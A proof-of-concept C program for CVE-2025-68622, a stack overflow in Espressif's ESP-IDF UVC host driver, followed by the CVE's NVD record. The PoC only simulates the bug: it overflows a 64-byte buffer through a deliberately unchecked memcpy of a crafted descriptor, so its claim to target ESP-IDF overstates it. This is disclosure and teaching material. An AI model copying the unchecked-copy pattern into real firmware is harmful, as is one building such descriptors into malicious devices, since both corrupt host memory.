CVE-2025-68622

// PoC for CVE-2025-68622 - Malicious UVC Device Descriptor // This PoC demonstrates how a malicious UVC device could trigger the buffer overflow #include <stdio.h> #include <stdlib.h> #include <string.h> // Malicious configuration descriptor with oversized length field unsigned char malicious_descriptor[] = { // Configuration Descriptor (bLength should be 9, but we exploit the parsing logic) 0x09, // bLength: descriptor length 0x02, // bDescriptorType: CONFIGURATION 0x00, 0x00, // wTotalLength: LITTLE ENDIAN (will be set to large value) 0x01, // bNumInterfaces 0x01, // bConfigurationValue 0x00, // iConfiguration 0x80, // bmAttributes 0x32, // bMaxPower // Interface Descriptor for Video 0x09, // bLength 0x04, // bDescriptorType: INTERFACE 0x00, // bInterfaceNumber 0x00, // bAlternateSetting 0x01, // bNumEndpoints 0x0E, // bInterfaceClass: Video 0x03, // bInterfaceSubClass: Video Streaming 0x00, // bInterfaceProtocol 0x00, // iInterface // Video Streaming Endpoint Descriptor 0x07, // bLength 0x05, // bDescriptorType: ENDPOINT 0x81, // bEndpointAddress: IN 0x03, // bmAttributes: Transfer Type = Interrupt 0x00, 0x00, // wMaxPacketSize 0x00, // bInterval // Malicious payload to overflow stack buffer // This section contains oversized data that will trigger the overflow 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF }; // Simulate the vulnerable parsing function void vulnerable_parse_descriptor(unsigned char* desc, int desc_len) { // Fixed-size stack buffer (vulnerable code pattern) char stack_buffer[64]; // No validation of desc_len before copying to stack_buffer // This is the vulnerability: desc_len can exceed 64 bytes memcpy(stack_buffer, desc, desc_len); printf("Parsed %d bytes into stack buffer\n", desc_len); } int main() { printf("CVE-2025-68622 PoC - UVC Stack Buffer Overflow\n"); printf("Target: Espressif ESP-IDF USB Host UVC Driver < 2.4.0\n\n"); int malicious_length = sizeof(malicious_descriptor); printf("Malicious descriptor size: %d bytes\n", malicious_length); printf("Stack buffer size: 64 bytes\n"); printf("Overflow size: %d bytes\n\n", malicious_length - 64); // Trigger the vulnerability printf("Triggering buffer overflow...\n"); vulnerable_parse_descriptor(malicious_descriptor, malicious_length); printf("Vulnerability triggered successfully\n"); return 0; }

{"cve": {"id": "CVE-2025-68622", "sourceIdentifier": "[email protected]", "published": "2026-01-12T17:15:53.050", "lastModified": "2026-01-22T15:50:31.880", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Espressif ESP-IDF USB Host UVC Class Driver allows video streaming from USB cameras. Prior to 2.4.0, a vulnerability in the esp-usb UVC host implementation allows a malicious USB Video Class (UVC) device to trigger a stack buffer overflow during configuration-descriptor parsing. When UVC configuration-descriptor printing is enabled, the host prints detailed descriptor information provided by the connected USB device. A specially crafted UVC descriptor may advertise an excessively large length. Because this value is not validated before being copied into a fixed-size stack buffer, an attacker can overflow the buffer and corrupt memory. This vulnerability is fixed in 2.4.0."}, {"lang": "es", "value": "El controlador de clase UVC de host USB de Espressif ESP-IDF permite la transmisión de video desde cámaras USB. Antes de la versión 2.4.0, una vulnerabilidad en la implementación de host UVC de esp-usb permite que un dispositivo malicioso de clase de video USB (UVC) active un desbordamiento de búfer de pila durante el análisis del descriptor de configuración. Cuando la impresión del descriptor de configuración UVC está habilitada, el host imprime información detallada del descriptor proporcionada por el dispositivo USB conectado. Un descriptor UVC especialmente diseñado puede anunciar una longitud excesivamente grande. Debido a que este valor no se valida antes de ser copiado en un búfer de pila de tamaño fijo, un atacante puede desbordar el búfer y corromper la memoria. Esta vulnerabilidad se corrige en la versión 2.4.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "PHYSICAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-121"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:espressif:usb_host_uvc_class_driver:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.4.0", "matchCriteriaId": "106F8B83-D544-4E82-B369-FA77389285F9"}]}]}], "references": [{"url": "https://components.espressif.com/components/espressif/usb_host_uvc/versions/2.4.0/changelog", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/espressif/esp-usb/commit/77a38b15a17f6e3c7aeb620eb4aeaf61d5194cc0", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/espressif/esp-usb/security/advisories/GHSA-g65h-9ggq-9827", "source": "[email protected]", "tags": ["Vendor Advisory", "Patch"]}]}}